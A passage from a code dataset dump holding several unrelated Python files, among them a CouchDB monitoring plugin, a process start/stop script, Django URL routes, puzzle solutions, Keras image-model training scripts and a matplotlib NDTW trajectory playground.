(ValueError, AttributeError) as e:\n self.error('Cant get database stats: {}'.format(str(repr(e))))\n return False\n return True\n\n def __create_stats_charts(self, db_name):\n \"\"\"\n Called only from check()\n :param db_name: str\n :return: order, definitions\n \"\"\"\n order = []\n definitions = {}\n documents_delta = '{}_database_documents_delta'.format(db_name)\n documents = '{}_database_documents'.format(db_name)\n fragmentation = '{}_database_fragmentation'.format(db_name)\n seq_delta = '{}_database_seq_delta'.format(db_name)\n seq = '{}_database_seq'.format(db_name)\n order.extend((\n documents_delta,\n documents,\n fragmentation,\n seq_delta,\n seq))\n\n for chart in order:\n definitions[chart] = {'options': [], 'lines': []}\n\n definitions[documents_delta]['options'] = \\\n [None, 'Documents delta', 'documents', 'Database {}'.format(db_name), '', 'line']\n definitions[documents_delta]['lines'].extend((\n ['{}_docs_delta'.format(db_name), 'docs delta', 'absolute', 1, 1],\n ['{}_docs_deleted_delta'.format(db_name), 'docs_deleted 
delta', 'absolute', 1, 1]\n ))\n definitions[documents]['options'] = \\\n [None, 'Documents count', 'documents', 'Database {}'.format(db_name), '', 'line']\n definitions[documents]['lines'].extend((\n ['{}_docs'.format(db_name), 'docs', 'absolute', 1, 1],\n ['{}_docs_deleted'.format(db_name), 'docs_deleted', 'absolute', 1, 1]\n ))\n definitions[fragmentation]['options'] = \\\n [None, 'Database fragmentation', 'Megabytes', 'Database {}'.format(db_name), '', 'stacked']\n definitions[fragmentation]['lines'].extend((\n ['{}_disk_size_overhead'.format(db_name), 'disk size overhead', 'absolute', 1, 1],\n ['{}_data_size'.format(db_name), 'data size', 'absolute', 1, 1]\n ))\n definitions[seq_delta]['options'] = \\\n [None, 'Database seq delta', 'seq', 'Database {}'.format(db_name), '', 'line']\n definitions[seq_delta]['lines'].extend((\n ['{}_committed_db_seq_delta'.format(db_name), 'committed seq', 'absolute', 1, 1],\n ['{}_update_db_seq_delta'.format(db_name), 'update seq', 'absolute', 1, 1]\n ))\n definitions[seq]['options'] = \\\n [None, 'Database seq', 'seq', 'Database {}'.format(db_name), '', 'line']\n definitions[seq]['lines'].extend((\n ['{}_committed_db_seq'.format(db_name), 'committed seq', 'absolute', 1, 1],\n ['{}_update_db_seq'.format(db_name), 'update seq', 'absolute', 1, 1]\n ))\n self.order = self.order + order\n self.definitions.update(definitions)\n\n def _get_replication_data(self, db_name):\n \"\"\"\n Get replication data from /_active_tasks\n :param db_name: str\n :return: None or False\n \"\"\"\n active_tasks = self._get_response(self.active_tasks_url)\n if not active_tasks:\n return None\n else:\n for active_task in active_tasks:\n if active_task['type'] == \"replication\":\n source_host, source_db = self.__get_host_and_db(active_task['source'])\n target_host, target_db = self.__get_host_and_db(active_task['target'])\n\n if target_host == 'localhost' and target_db == db_name:\n repl_type = 'pull'\n elif target_host != 'localhost' and source_db == db_name:\n repl_type = 'push'\n else:\n continue\n # values\n source_seq = active_task['source_seq']\n checkpointed_seq = active_task['checkpointed_source_seq']\n # var names\n source_seq_name = '{}:{}_{}_source_seq'.format(source_host, source_db, repl_type)\n checkpointed_seq_name = '{}:{}_checkpointed_seq'.format(source_host, source_db, repl_type)\n # chart var\n source_chart_name = 'source_seq {}:{}'.format(source_host, source_db)\n checkpointed_chart_name = 'checkpointed_source_seq {}:{}'.format(source_host, source_db)\n self.data[source_seq_name] = source_seq\n self.data[checkpointed_seq_name] = checkpointed_seq\n self.__calc_delta(\n source_seq_name,\n checkpointed_seq_name\n )\n\n # need to create charts\n self.__create_replication_charts(db_name, source_chart_name, source_seq_name, repl_type)\n self.__create_replication_charts(db_name, checkpointed_chart_name, checkpointed_seq_name,\n repl_type)\n self.order = self.order + self.repl_order\n self.definitions.update(self.repl_definitions)\n\n def __create_replication_charts(self, db_name, chart_name, var_name, repl_type):\n \"\"\"\n :param db_name: db\n :param chart_name: source_seq host:db\n :param var_name: host:db_pull_source_seq\n :param repl_type: pull\n :return: order, definitions\n \"\"\"\n dimension_name = '{}_{}_replication_seq'.format(db_name, repl_type)\n dimension_name_delta = '{}_{}_replication_seq_delta'.format(db_name, repl_type)\n\n chart_name_delta = '{}_delta'.format(chart_name)\n var_name_delta = '{}_delta'.format(var_name)\n\n if self.repl_definitions == 
{}: # first run\n if dimension_name not in self.order:\n self.repl_order.append(dimension_name_delta)\n self.repl_order.append(dimension_name)\n\n for chart in self.repl_order:\n self.repl_definitions[chart] = {'options': [], 'lines': []}\n\n self.repl_definitions[dimension_name_delta]['options'] = \\\n [None, '{} replication seq delta'.format(repl_type), 'seq', 'Database {}'.format(db_name), '', 'line']\n self.repl_definitions[dimension_name]['options'] = \\\n [None, '{} replication seq'.format(repl_type), 'seq', 'Database {}'.format(db_name), '', 'line']\n\n self.repl_definitions[dimension_name_delta]['lines'].append(\n [var_name_delta, chart_name_delta, 'absolute', 1, 1]\n )\n self.repl_definitions[dimension_name]['lines'].append(\n [var_name, chart_name, 'absolute', 1, 1]\n )\n\n def _get_data(self):\n create = False\n temp_order = self.order[:]\n temp_definitions = self.definitions.copy()\n # clear\n self.__flush_data()\n self.order = []\n self.definitions = {}\n # get data\n for db in self.monitoring_dbs:\n self._get_stats_data(db)\n self._get_replication_data(db)\n self.repl_order = []\n self.repl_definitions = {}\n # check new data\n if temp_order != self.order or temp_definitions != self.definitions:\n create = True\n # create charts\n if create: self.create()\n return self.data\n\n def create(self):\n \"\"\"\n Create charts\n :return: boolean\n \"\"\"\n # data = self._get_data()\n # if data is None:\n # return False\n\n idx = 0\n for name in self.order:\n options = self.definitions[name]['options'] + [self.priority + idx, self.update_every]\n self.chart(self.chart_name + \".\" + name, *options)\n # check if server has this datapoint\n for line in self.definitions[name]['lines']:\n if line[0] in self.data:\n self.dimension(*line)\n idx += 1\n\n self.commit()\n return True\n\n#\nDEBUG = True\nif DEBUG:\n s = Service(\n configuration={\n 'update_every': 1,\n 'retries': 60,\n 'priority': 60000\n }\n )\n s.check()\n s.create()\n s.run()\n","repo_name":"shellshock1953/share","sub_path":"couchdb_dbstats.chart.py","file_name":"couchdb_dbstats.chart.py","file_ext":"py","file_size_in_byte":13429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4680261628","text":"#!/usr/bin/env /usr/bin/python3.4\nimport sys\nimport os\nimport signal\n\noption = sys.argv[1]\nif len(sys.argv) > 2:\n\tprint(\"====================================================\")\n\tprint(\"Usage of kvs_manager : \")\n\tprint(\"kvs_manager start/stop/status\")\n\tprint(\"====================================================\")\n\n\ndef main():\n\n\tif option == \"start\":\n\t\tprint(\"Starting kvs_manager ...\")\n\t\tos.chdir(\"/aux0/customer/containers/ockvsman/bin/\")\n\t\tos.system(\"/usr/bin/python3.4 kvs_wrapper.py >/dev/null 2>/dev/null &\")\n\telif option == \"stop\":\n\t\tpstring = \"kvs_wrapper.py\"\n\t\tfor line in os.popen(\"ps ax | grep \" + pstring + \" | grep -v grep\"):\n\t\t\tfields = line.split()\n\t\t\tpid = fields[0]\n\t\tprint(\"Stopping kvs_wrapper ...\")\n\t\tos.kill(int(pid), signal.SIGKILL)\n\telif option == 'status':\n\t\tpstring = \"kvs_wrapper.py\"\n\t\tpid = None\n\t\tfor line in os.popen(\"ps ax | grep \" + pstring + \" | grep -v grep\"):\n\t\t\tfields = line.split()\n\t\t\tpid = fields[0]\n\t\tif not pid:\n\t\t\tprint(\"kvs_wrapper is not running: NO PID\")\n\t\t\treturn\n\t\telse:\n\t\t\tprint(\"kvs_wrapper is running: {}\".format(pid))\t\n\telse:\n\t\tprint(\"====================================================\")\n\t\tprint(\"Usage 
of kvs_wrapper : \")\n\t\tprint(\"kvs_manager start/stop/status\")\n\t\tprint(\"====================================================\")\n\nmain()","repo_name":"pkolev1994/kvsmanager","sub_path":"bin/ockvsman.py","file_name":"ockvsman.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23932295803","text":"from django.urls import path\nfrom .views import *\nurlpatterns = [\n path('',principal,name='principal'),\n path('autos/',autos,name='autos'),\n path('clientes/',clientes,name='clientes'),\n path('ingresarautos/',ingresarAutos,name='ingresarautos'),\n path('ingresarclientes/',ingresarClientes,name='ingresarclientes'),\n path('eliminarautos/<int:id>/',eliminarAutos,name='eliminarautos'),\n path('eliminarclientes/<int:id>/',eliminarClientes,name='eliminarclientes'),\n path('actualizarauto/<int:id>/',actualizarAuto,name='actualizarauto'),\n path('actualizarcliente/<int:id>/',actualizarCliente,name='actualizarcliente'),\n]\n","repo_name":"YOYO-DR/yoiner-duran-2567910","sub_path":"autos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27757309025","text":"tower = []\n\nwith open(\"Day7Input.txt\", \"r\") as f:\n for line in f:\n tower.append(line.strip().split())\n\n# Round 2\nclass Tree(object):\n \"Generic tree node.\"\n\n def __init__(self, name=\"root\", weight=0, children=None):\n self.name = name\n self.weight = weight\n self.children = []\n if children is not None:\n for child in children:\n self.add_child(child)\n self.weight_plus_children = self.get_all_weight()\n self.balanced = (\n len(list(set([child.weight_plus_children for child in self.children])))\n == 1\n )\n if not self.balanced:\n print(\"Unbalanced...\", self.name)\n print([child.weight_plus_children for child in self.children])\n print([child.name for child in self.children])\n else:\n self.balanced = True\n\n def __repr__(self):\n return self.name\n\n def add_child(self, node):\n assert isinstance(node, Tree)\n self.children.append(node)\n\n def get_all_weight(self):\n if self.children is None:\n return self.weight\n else:\n self.weight_plus_children = self.weight\n for child in self.children:\n print\n \"child.get_all_weight()\", child.get_all_weight()\n self.weight_plus_children += child.get_all_weight()\n\n return self.weight_plus_children\n\n\nroot = \"ykpsek\" # \"tknk\"#\ndisc_names = [item[0] for item in tower]\ndependencies = {}\ndisc_weights = {}\n\nfor i in range(len(tower)):\n if \"->\" in tower[i]:\n to_add = []\n for j in range(3, len(tower[i])):\n to_add.append(tower[i][j].split(\",\")[0])\n dependencies[disc_names[i]] = to_add\n else:\n dependencies[disc_names[i]] = None\n disc_weights[disc_names[i]] = int(tower[i][1][1:-1])\n\n\ndef create_tree(my_tree):\n if dependencies[my_tree] == None:\n return Tree(my_tree, disc_weights[my_tree], None)\n else:\n return Tree(\n my_tree,\n disc_weights[my_tree],\n [create_tree(i) for i in dependencies[my_tree]],\n )\n\n\nmy_tree = create_tree(root)\n\n# Round 1\n#\n# top_row = []\n# dependencies = {}\n#\n# for i in range(len(tower)):\n# if '->' in tower[i]:\n# to_add = []\n# for j in range(3, len(tower[i])):\n# to_add.append(tower[i][j].split(\",\")[0])\n# dependencies[disc_names[i]] = to_add\n# else:\n# top_row.append(disc_names[i])\n#\n# while len(dependencies.keys()) > 2:\n# new_dependencies = {}\n# new_top_row = []\n#\n# for item in 
dependencies.keys():\n# non_top = []\n# for value in dependencies[item]:\n# if value not in top_row:\n# non_top.append(value)\n# if len(non_top) != 0:\n# new_dependencies[item] = [i for i in non_top]\n# else:\n# new_top_row.append(item)\n# dependencies = new_dependencies\n# top_row += new_top_row\n#\n# print(new_dependencies.keys())\n","repo_name":"glsdown/adventofcode-2017","sub_path":"Day7.py","file_name":"Day7.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69873594002","text":"import sys\nfrom itertools import permutations\narr=sys.stdin.readline().strip()\nans='Z'*50\nfor i in set(permutations(arr)):\n print(i)\n flag=True\n for k in range(len(arr)//2):\n if i[k]!=i[len(arr)-1-k]:\n flag=False\n break\n if flag:\n if ans>''.join(i):\n ans=''.join(i)\nif not len(ans):\n print(\"I'm Sorry Hansoo\")\nelse:\n print(ans)\n","repo_name":"auddus16/Algorithm_python","sub_path":"bookstudy/알고리즘핵심문제20/1213_팰린드롬만들기.py","file_name":"1213_팰린드롬만들기.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17807679599","text":"import cv2\nimport numpy as np\nfrom keras.models import Model\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers import Input, merge, SpatialDropout2D\nfrom keras.layers import Convolution2D, AveragePooling2D, UpSampling2D\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import backend as K\n\nfrom data import load_train_data, load_test_data\n\nK.set_image_dim_ordering('th') # Theano dimension ordering in this code\n\nimg_rows = 100\nimg_cols = 160\nstack = 10\n\nsmooth = 1.\n\n\ndef dice_coef(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. 
* intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n\n\ndef dice_coef_loss(y_true, y_pred):\n return -dice_coef(y_true, y_pred)\n\n\ndef create_model():\n input = Input(shape=(1, img_rows, img_cols))\n \n conv1 = Convolution2D(32, 3, 3, border_mode='same', init='he_normal')(input)\n conv1 = LeakyReLU()(conv1)\n conv1 = SpatialDropout2D(0.2)(conv1)\n conv1 = Convolution2D(32, 3, 3, border_mode='same', init='he_normal')(conv1)\n conv1 = LeakyReLU()(conv1)\n conv1 = SpatialDropout2D(0.2)(conv1)\n pool1 = AveragePooling2D(pool_size=(2,2))(conv1)\n \n conv2 = Convolution2D(64, 3, 3, border_mode='same', init='he_normal')(pool1)\n conv2 = LeakyReLU()(conv2)\n conv2 = SpatialDropout2D(0.2)(conv2)\n conv2 = Convolution2D(64, 3, 3, border_mode='same', init='he_normal')(conv2)\n conv2 = LeakyReLU()(conv2)\n conv2 = SpatialDropout2D(0.2)(conv2)\n pool2 = AveragePooling2D(pool_size=(2,2))(conv2)\n \n conv3 = Convolution2D(128, 3, 3, border_mode='same', init='he_normal')(pool2)\n conv3 = LeakyReLU()(conv3)\n conv3 = SpatialDropout2D(0.2)(conv3)\n conv3 = Convolution2D(128, 3, 3, border_mode='same', init='he_normal')(conv3)\n conv3 = LeakyReLU()(conv3)\n conv3 = SpatialDropout2D(0.2)(conv3)\n \n comb1 = merge([conv2, UpSampling2D(size=(2,2))(conv3)], mode='concat', concat_axis=1)\n conv4 = Convolution2D(64, 3, 3, border_mode='same', init='he_normal')(comb1)\n conv4 = LeakyReLU()(conv4)\n conv4 = SpatialDropout2D(0.2)(conv4)\n conv4 = Convolution2D(64, 3, 3, border_mode='same', init='he_normal')(conv4)\n conv4 = LeakyReLU()(conv4)\n conv4 = SpatialDropout2D(0.2)(conv4)\n \n comb2 = merge([conv1, UpSampling2D(size=(2,2))(conv4)], mode='concat', concat_axis=1)\n conv5 = Convolution2D(32, 3, 3, border_mode='same', init='he_normal')(comb2)\n conv5 = LeakyReLU()(conv5)\n conv5 = SpatialDropout2D(0.2)(conv5)\n conv5 = Convolution2D(32, 3, 3, border_mode='same', init='he_normal')(conv5)\n conv5 = LeakyReLU()(conv5)\n conv5 = SpatialDropout2D(0.2)(conv5)\n \n output = Convolution2D(1, 1, 1, activation='sigmoid')(conv5)\n\n model = Model(input=input, output=output)\n model.compile(optimizer=Adam(lr=3e-4), loss='binary_crossentropy')\n return model\n\n\ndef preprocess(imgs):\n imgs_p = np.ndarray((imgs.shape[0], imgs.shape[1], img_rows, img_cols), dtype=np.uint8)\n for i in range(imgs.shape[0]):\n imgs_p[i, 0] = cv2.resize(imgs[i, 0], (img_cols, img_rows), interpolation=cv2.INTER_CUBIC)\n return imgs_p\n\n\ndef train_and_predict():\n print('-'*30)\n print('Loading and preprocessing train data...')\n print('-'*30)\n imgs_train, imgs_mask_train = load_train_data()\n\n imgs_train = preprocess(imgs_train)\n imgs_mask_train = preprocess(imgs_mask_train)\n\n imgs_train = imgs_train.astype('float32')\n mean = np.mean(imgs_train) # mean for data centering\n std = np.std(imgs_train) # std for data normalization\n\n imgs_train -= mean\n imgs_train /= std\n\n imgs_mask_train = imgs_mask_train.astype('float32')\n imgs_mask_train /= 255. 
# scale masks to [0, 1]\n\n print('-'*30)\n print('Creating and compiling model...')\n print('-'*30)\n model = create_model()\n\n print('-'*30)\n print('Building data augmentation object...')\n print('-'*30)\n datagen = ImageDataGenerator(\n rotation_range=15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n shear_range=0.15,\n horizontal_flip=True,\n vertical_flip=True)\n \n total = imgs_train.shape[0]\n img = []\n count = 0\n for batch in datagen.flow(imgs_train, batch_size=1, seed=1337):\n img.append(batch)\n count += 1\n if count > total*stack:\n break\n imgs_train = np.array(img)[:,0]\n\n mask = [] \n count = 0\n for batch in datagen.flow(imgs_mask_train, batch_size=1, seed=1337): \n mask.append(batch)\n count += 1\n if count > total*stack:\n break\n imgs_mask_train = np.array(mask)[:,0]\n \n callbacks = [\n EarlyStopping(monitor='loss', patience=5, verbose=0),\n ModelCheckpoint('weights.hdf5', monitor='loss', save_best_only=True)\n ]\n \n print('-'*30)\n print('Begin training...')\n print('-'*30)\n model.fit(imgs_train, imgs_mask_train, batch_size=4, nb_epoch=100, verbose=1, shuffle=True,\n callbacks=callbacks)\n\n print('-'*30)\n print('Loading and preprocessing test data...')\n print('-'*30)\n imgs_test = load_test_data()\n imgs_test = preprocess(imgs_test)\n\n imgs_test = imgs_test.astype('float32')\n imgs_test -= mean\n imgs_test /= std\n\n print('-'*30)\n print('Loading saved weights...')\n print('-'*30)\n model.load_weights('weights.hdf5')\n\n print('-'*30)\n print('Predicting masks on test data...')\n print('-'*30)\n imgs_mask_test = model.predict(imgs_test, verbose=1)\n np.save('imgs_mask_test.npy', imgs_mask_test)\n\n\nif __name__ == '__main__':\n train_and_predict()\n","repo_name":"gaudetcj/GlandSegmentation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5773,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"} +{"seq_id":"70742165203","text":"## Functions used in optimizing model hyperparameters\nimport os\nfrom time import perf_counter\nfrom utilities.io import Labels\nfrom build_model import *\n\nimport numpy as np\n\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Model\nfrom keras.layers import InputLayer\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.xception import Xception\n\ndef stratified_train_val_test(y):\n \"\"\"\n Generate stratified train-val-test splits. \n Hard coded for 70-20-10 proportion\n \n Input:\n y - label array that train-val-test indices will be produced for\n\n Output:\n train - training set indices\n valid - validation set indices\n test - test set indices\n \"\"\"\n # Train-test split\n sss = StratifiedShuffleSplit(n_splits=1,test_size=.1)\n train, test = next(sss.split(y,y))\n \n # Train-validate split\n sss = StratifiedShuffleSplit(n_splits=1,test_size=2/9)\n train, valid = next(sss.split(y[train],y[train]))\n return train, valid, test\n\ndef subset_labels(indices,labels,chunksize,name):\n \"\"\"\n Subset a labels object and prepare it for reading bottleneck features.\n\n Create a Labels object from the input \"labels\" containing only\n the entries specified by \"indices\". 
The new Labels object's target is \n then set for bottleneck features and set to return numpy arrays.\n\n Input:\n indices - The indices for the data subset\n labels - The Labels object that will be subsetted\n chunksize - The chunksize to use when reading values from the subset\n name - The model name\n\n Output:\n sub_labels - Subsetted Labels object\n \"\"\"\n sub_labels = Labels(labels.labels.iloc[indices,:],\n labels.image_path_prefix, labels.n_images_loaded)\n sub_labels.set_data_target('bottleneck',chunksize,name)\n sub_labels.iter_df = False\n return sub_labels\n\ndef optimize_model(model, name, train_labels, valid_labels,\n max_epochs=5, pretrain_dense=False, load_trained=True):\n \"\"\"\n Optimize the supplied model with layers unfrozen at a variety of depths.\n\n The best model is tracked over epochs and the best one for both the \n output layer unfrozen and for any number of internal layers unfrozen\n is saved.\n\n Input:\n model - The keras Model to train\n name - The string to use for the model name\n train_labels - Labels object containing training data\n valid_labels - Labels object containing validation data\n max_epochs - The number of epochs to train each unfrozen non-output layer\n pretrain_dense - Train the output layer for extra iterations?\n load_trained - Use the previously saved weights as a starting point?\n\n Output:\n history_list - Training session history object\n\n Side Effect:\n Best models written to disk\n \"\"\"\n # Output layer gets tuned first\n refit_modelf = 'intermediates/saved_models/test_{}_tuned_out_layer.hdf5'.format(name)\n tuned_modelf = 'intermediates/saved_models/test_{}_base_weights.hdf5'.format(name)\n \n if load_trained and os.path.exists(refit_modelf):\n # Load pre-trained output layer weights\n model.load_weights(refit_modelf)\n\n history_list = []\n if pretrain_dense or not os.path.exists(refit_modelf):\n checkpointer = ModelCheckpoint(\n filepath=refit_modelf, \n verbose=1, save_best_only=True)\n unfreeze_model(model,1)\n \n history = model.fit_generator(train_labels,\n steps_per_epoch=train_labels.n_chunk,\n epochs=100,\n verbose=1,\n callbacks=[checkpointer],\n validation_data=valid_labels,\n validation_steps=valid_labels.n_chunk,\n )\n history_list.append(history)\n history_list.append(None) # Marks end of pretraining history\n\n # Use best weights found so far\n model.load_weights(refit_modelf)\n \n checkpointer = ModelCheckpoint(\n filepath=tuned_modelf, \n verbose=1, save_best_only=True)\n max_unfrozen = count_max_frozen(model)\n for i_unfrozen in range(2,max_unfrozen+1):\n unfreeze_model(model,i_unfrozen)\n \n history = model.fit_generator(train_labels,\n steps_per_epoch=train_labels.n_chunk,\n epochs=max_epochs,\n verbose=1,\n callbacks=[checkpointer],\n validation_data=valid_labels,\n validation_steps=valid_labels.n_chunk,\n )\n history_list.append(history)\n print('Model tuned with {} of {} layers unfrozen'\n .format(i_unfrozen,max_unfrozen))\n return history_list\n\ndef count_max_frozen(model):\n \"\"\"\n Counts the total number of layers in model that have weights\n \n Input:\n model - The model we want to count the layers of\n\n Output:\n freeze_count - The number of layers available to freeze\n \"\"\"\n freeze_count = 0\n for layer in model.layers:\n if layer.weights:\n freeze_count += 1\n return freeze_count\n\ndef unfreeze_model(model,n_unfrozen):\n \"\"\"\n Unfreeze from the output layer to n_unfrozen layers in.\n\n Done according to the order specified in model.layers\n only counting layers with weights. 
\n\n Input:\n model - The model that will have its layers unfrozen\n n_unfrozen - The number of layers to unfreeze\n\n Side Effect:\n n_unfrozen layers set to trainable\n \"\"\"\n i_unfrozen = 0\n for layer in model.layers[::-1]:\n if layer.weights:\n layer.trainable = True\n i_unfrozen += 1\n if i_unfrozen == n_unfrozen:\n break\n \ndef prep_model(model,max_layer,depth):\n \"\"\"\n Copy the last few layers of model and prepare the \n resulting model for training.\n\n Input:\n model - The model used as reference\n max_layer - Layer with this name has its output replaced with input layer\n depth - The number of model outputs\n\n Output:\n model_top - The top of model, capable of taking input and with a new\n output layer\n \"\"\"\n model_top = model_top_at_layer(model,max_layer)\n model_top = replace_out_layer(model_top,depth)\n for layer in model_top.layers:\n layer.trainable = False\n model_top.layers[-1].trainable = True\n model_top.compile('adam','categorical_crossentropy',metrics=['accuracy'])\n return model_top\n\ndef expand_labels(labels):\n \"\"\"\n Prepare labels to read flipped bottleneck features and train.\n\n Input:\n labels - Labels object with only base image paths\n\n Output:\n labels - Labels object with flipped image paths added and OHE targets\n \"\"\"\n # Append paths to flipped image bottleneck features\n flip_labels = labels.labels.copy()\n flip_labels['image_name'] = flip_labels['image_name'].apply(\n lambda x: '_flip' + x)\n flip_labels = Labels(flip_labels,image_path_prefix,labels.n_images_loaded)\n labels = labels + flip_labels\n \n labels.one_hot_labels()\n return labels\n\ndef train_model(labels, chunksize):\n \"\"\"\n Train the models specified by models_to_run on the images \n supplied in labels. Model weights saved to disk. 
\n\n Input:\n labels - Labels object containing references to data to train on\n chunksize - The number of images to train on at a time\n\n Output:\n hist_dict - Maps model name to its training history\n \"\"\"\n labels = expand_labels(labels)\n hist_dict = {}\n train, valid, test = stratified_train_val_test(\n np.stack(labels.labels['category_label'].values))\n \n max_layer_dict = {\n 'resnet' : 'activation_46',\n 'inception_v3' : 'mixed9',\n 'xception' : 'add_28',\n }\n\n model_dict = {\n 'resnet' : ResNet50(weights='imagenet'),\n 'inception_v3' : InceptionV3(weights='imagenet'),\n 'xception' : Xception(weights='imagenet'),\n }\n\n models_to_run = [\n # 'resnet', \n # 'inception_v3',\n 'xception',\n ]\n for name in models_to_run:\n print('Fine tuning {} model'.format(name))\n model = model_dict[name]\n max_layer = max_layer_dict[name]\n model_top = prep_model(model,max_layer,depth=10)\n \n train_labels = subset_labels(train,labels,chunksize,name)\n valid_labels = subset_labels(valid,labels,chunksize,name)\n \n start = perf_counter()\n hist_dict[name] = optimize_model(model_top,name,train_labels,\n valid_labels,\n pretrain_dense=True, load_trained=True)\n print('Took {} seconds to optimize all layers for {}'\n .format(perf_counter() - start,name))\n return hist_dict\n\n\nif __name__ == '__main__':\n ## Train the top of the model on the selected labels\n np.random.seed(313) # For reproducibility\n \n chunksize = 3000\n n_images_loaded = 150 # -1 loads all\n image_to_category = 'data/Category and Attribute Prediction Benchmark' \\\n '/Anno/list_category_img.txt'\n image_path_prefix = 'data/Category and Attribute Prediction Benchmark' \\\n '/Img/Img/'\n labels = Labels(image_to_category, image_path_prefix, n_images_loaded)\n\n hist_dict = train_model(labels, chunksize)\n","repo_name":"magee256/clothing_object_recognition","sub_path":"classifier/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":9481,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"18021370507","text":"import math\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backend_bases import MouseEvent\nfrom matplotlib.widgets import Slider\n\nfrom cdtw import compute_uniform_cdtw, interpolate_trajectory, compute_ndtw\n\n\nclass NDTWPlayground(object):\n u\"\"\" Matplotlib Draggable Points base from https://github.com/yuma-m/matplotlib-draggable-plot \"\"\"\n\n def __init__(self):\n self._figure, self._axes, self.__line = None, None, [None, None]\n self._dragging_point = None\n self.__points = [{}, {}]\n self._selected_plot = 0\n self._colors = ['b', 'r']\n self.npts = 50\n self.sdist = 10\n\n self._init_plot()\n\n def _init_plot(self):\n self._figure = plt.figure(\"Draw plot\")\n axes = self._figure.add_axes([0.075, 0.25, 0.85, 0.70])\n axes.set_xlim(0, 100)\n axes.set_ylim(0, 100)\n axes.grid(which=\"both\")\n self._axes = axes\n\n self._figure.canvas.mpl_connect('button_press_event', self._on_click)\n self._figure.canvas.mpl_connect('button_release_event', self._on_release)\n self._figure.canvas.mpl_connect('motion_notify_event', self._on_motion)\n self._figure.canvas.mpl_connect('key_press_event', self._on_keypress)\n\n self.npts_slider_ax = self._figure.add_axes([0.25, 0.15, 0.65, 0.03])\n self.npts_slider = Slider(self.npts_slider_ax, 'Num Points', 0, 500, valinit=self.npts, valstep=10)\n self.npts_slider.on_changed(self.npts_changed)\n\n self.sdist_slider_ax = self._figure.add_axes([0.25, 0.10, 0.65, 0.03])\n self.sdist_slider = 
Slider(self.sdist_slider_ax, 'Success dist', 0, 100, valinit=self.sdist, valstep=5)\n self.sdist_slider.on_changed(self.sdist_changed)\n plt.show()\n\n @property\n def _points(self):\n return self.__points[self._selected_plot]\n\n @property\n def _line(self):\n return self.__line[self._selected_plot]\n\n @_line.setter\n def _line(self, a):\n self.__line[self._selected_plot] = a\n\n def npts_changed(self, val):\n self.npts = val\n self._update_plot()\n\n def sdist_changed(self, val):\n self.sdist = val\n self._update_plot()\n\n def show_ndtw(self):\n if not (len(self.__points[0].items()) > 1 and len(self.__points[1].items()) > 1):\n return\n path1 = list(sorted(self.__points[0].items()))\n path2 = list(sorted(self.__points[1].items()))\n\n if self.npts > 0:\n ndtw, dtw = compute_uniform_cdtw(path1, path2, self.sdist, self.npts, return_dtw=True)\n else:\n ndtw, dtw = compute_ndtw(path1, path2, self.sdist, return_dtw=True)\n\n self._figure.suptitle(f'NDTW = {ndtw}; DTW = {dtw}')\n\n def _on_keypress(self, event):\n if event.key == 'enter':\n path1 = list(sorted(self.__points[0].items()))\n path2 = list(sorted(self.__points[1].items()))\n\n ndtw = compute_uniform_cdtw(path1, path2, self.sdist, self.npts)\n ap1 = list(interpolate_trajectory(path1, self.npts))\n ap2 = list(interpolate_trajectory(path2, self.npts))\n\n self.__line[0].set_data(*list(zip(*ap1)))\n self.__line[1].set_data(*list(zip(*ap2)))\n self.show_ndtw()\n self._figure.canvas.draw()\n print(ndtw)\n elif event.key == 'tab':\n self._selected_plot = (self._selected_plot + 1) % 2\n elif event.key == 'c':\n self._figure.clear()\n self.__init__()\n\n def _update_plot(self):\n tmp = self._selected_plot\n for i, points in enumerate(self.__points):\n self._selected_plot = i\n if not len(points):\n continue\n x, y = zip(*sorted(points.items()))\n # Add new plot\n if not self._line:\n self._line, = self._axes.plot(x, y, color=self._colors[i], marker=\"o\", markersize=10)\n # Update current plot\n else:\n self._line.set_data(x, y)\n self._selected_plot = tmp\n self.show_ndtw()\n self._figure.canvas.draw()\n\n def _add_point(self, x, y=None):\n if isinstance(x, MouseEvent):\n x, y = int(x.xdata), int(x.ydata)\n self._points[x] = y\n return x, y\n\n def _remove_point(self, x, _):\n if x in self._points:\n self._points.pop(x)\n\n def _find_neighbor_point(self, event):\n u\"\"\" Find point around mouse position\n :rtype: ((int, int)|None)\n :return: (x, y) if there are any point around mouse else None\n \"\"\"\n distance_threshold = 3.0\n nearest_point = None\n min_distance = math.sqrt(2 * (100 ** 2))\n for x, y in self._points.items():\n distance = math.hypot(event.xdata - x, event.ydata - y)\n if distance < min_distance:\n min_distance = distance\n nearest_point = (x, y)\n if min_distance < distance_threshold:\n return nearest_point\n return None\n\n def _on_click(self, event):\n u\"\"\" callback method for mouse click event\n :type event: MouseEvent\n \"\"\"\n # left click\n if event.button == 1 and event.inaxes in [self._axes]:\n point = self._find_neighbor_point(event)\n if point:\n self._dragging_point = 